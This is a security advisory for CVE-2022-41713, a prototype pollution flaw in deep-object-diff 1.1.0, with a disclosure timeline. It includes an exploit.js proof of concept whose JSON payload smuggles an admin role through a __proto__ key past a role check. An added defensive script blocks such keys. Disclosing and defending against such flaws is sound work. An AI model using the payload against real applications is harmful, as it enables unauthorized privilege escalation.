deep-object-diff 1.1.0 - Prototype Pollution

Summary

Name: deep-object-diff 1.1.0 - Prototype Pollution
Code name: Heldens
Product: deep-object-diff
Affected versions: Version 1.1.0
State: Public
Release date: 2022-11-15

Vulnerability

Kind: Prototype Pollution
Rule: 390. Prototype Pollution
Remote: Yes
CVSSv3 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
CVSSv3 Base Score: 7.3
Exploit available: Yes
CVE ID(s): CVE-2022-41713

Description

Version 1.1.0 of deep-object-diff allows an external attacker to edit or add new properties to an object. This is possible because the application does not properly validate incoming JSON keys, thus allowing the __proto__ property to be edited.

Vulnerability

Prototype pollution is a vulnerability that affects JavaScript applications. It occurs when a third party manages to modify the __proto__ of an object. When a method or attribute is accessed, JavaScript first checks whether it exists on the object itself; if so, it uses it. If not, it looks in the object's prototype. If the method or attribute is not in the object's prototype either, the property is undefined.

Therefore, if an attacker succeeds in injecting the __proto__ property into an object, they will succeed in injecting or editing its properties.

Exploitation

exploit.js

import { diff, addedDiff, deletedDiff, updatedDiff, detailedDiff } from 'deep-object-diff';

// Reference records: an existing admin and the user record the request will update.
let admin = {name: "admin", role:"admin"};
let user  = {role:"user"};

// A plain request that sets role=admin directly; the check in create_user rejects it.
let normal_user_request    = JSON.parse('{"name":"user","role":"admin"}');
// A request that carries the role inside a __proto__ key; the check never sees it.
let malicious_user_request = JSON.parse('{"name":"user","__proto__":{"role":"admin"}}');

const create_user = (new_user) => {
    // A user cannot alter his role. This way we prevent privilege escalations.
    if(new_user?.role && new_user?.role.toLowerCase() === "admin") {
        throw "Unauthorized Action";
    }
    // addedDiff walks the incoming keys, including "__proto__", and assigns them.
    user = addedDiff(user, new_user);
    console.log(user?.role);
};

try {
    create_user(normal_user_request);
} catch (error) {
    console.log(error);
}
finally {
    create_user(malicious_user_request);
}
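As an added example (not part of the advisory and not code from deep-object-diff), the following script ties together the lookup order described under Vulnerability and the check the PoC's create_user lacks: a helper that reports where a property resolves from, a scanner that flags __proto__, constructor and prototype keys anywhere in a parsed request, and a guarded added-properties merge that builds its result on a null prototype. All function and constant names are hypothetical, and the sample requests are constructed to mirror the PoC.

```javascript
// Added example for this advisory; not code from deep-object-diff or Fluid Attacks.
// FORBIDDEN_KEYS, lookupKind, findPrototypeKeys, safeAddedDiff and createUserSafely
// are hypothetical names.

const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Report where a property resolves from, following the lookup order described
// in the advisory: own property first, then the prototype chain, else undefined.
function lookupKind(obj, key) {
  if (Object.prototype.hasOwnProperty.call(obj, key)) return 'own';
  if (key in obj) return 'inherited';
  return 'undefined';
}

// Walk a parsed JSON value and return the dotted path of every key that could
// reach the prototype chain if the value were merged naively into another object.
function findPrototypeKeys(value, path = []) {
  const hits = [];
  if (value === null || typeof value !== 'object') return hits;
  for (const key of Object.keys(value)) {
    const here = [...path, key];
    if (FORBIDDEN_KEYS.has(key)) hits.push(here.join('.'));
    hits.push(...findPrototypeKeys(value[key], here));
  }
  return hits;
}

// Copy `base`, then add the own, enumerable keys of `incoming` that `base` lacks.
// The result has a null prototype, so nothing is inherited from Object.prototype
// even if it has already been polluted, and forbidden keys are refused outright.
function safeAddedDiff(base, incoming) {
  const out = Object.assign(Object.create(null), base);
  for (const key of Object.keys(incoming)) {
    if (FORBIDDEN_KEYS.has(key)) throw new Error(`rejected key: ${key}`);
    if (!Object.prototype.hasOwnProperty.call(base, key)) out[key] = incoming[key];
  }
  return out;
}

// The PoC's create_user flow with the guards applied: the role check is kept,
// but a request carrying prototype keys is refused before any merge happens.
function createUserSafely(currentUser, request) {
  const hits = findPrototypeKeys(request);
  if (hits.length > 0) throw new Error(`prototype keys in request: ${hits.join(', ')}`);
  if (typeof request.role === 'string' && request.role.toLowerCase() === 'admin') {
    throw new Error('Unauthorized Action');
  }
  return safeAddedDiff(currentUser, request);
}

// Constructed sample inputs mirroring the advisory's PoC.
const currentUser = { role: 'user' };
const maliciousRequest = JSON.parse('{"name":"user","__proto__":{"role":"admin"}}');
console.log(findPrototypeKeys(maliciousRequest));          // ['__proto__']
try { createUserSafely(currentUser, maliciousRequest); } catch (e) { console.log(e.message); }
console.log(lookupKind({}, 'role'));                        // 'undefined': Object.prototype untouched
console.log(createUserSafely(currentUser, JSON.parse('{"name":"bob"}')));
```

The scanner runs before the role check on purpose: JSON.parse turns a "__proto__" key into an ordinary own property, so request.role is still undefined at check time and a check that only reads request.role cannot see the smuggled value. Rejecting the three keys at every depth, rather than only at the top level, covers the constructor.prototype route as well.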

Evidence of exploitation

[Screenshot: Prototype-Pollution]

Our security policy

We have reserved the CVE-2022-41713 to refer to this issue from now on.

System Information

  • Version: deep-object-diff 1.1.0

  • Operating System: GNU/Linux

Mitigation

An updated version of deep-object-diff is available at the vendor page.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://github.com/mattphillips/deep-object-diff

Issue https://github.com/mattphillips/deep-object-diff/issues/85

Timeline

2022-10-05  Vulnerability discovered.

2022-10-05  Vendor contacted.

2022-10-05  Vendor replied acknowledging the report.

2022-10-05  Vendor confirmed the vulnerability.

2022-11-12  Vulnerability patched.

2022-11-15  Public disclosure.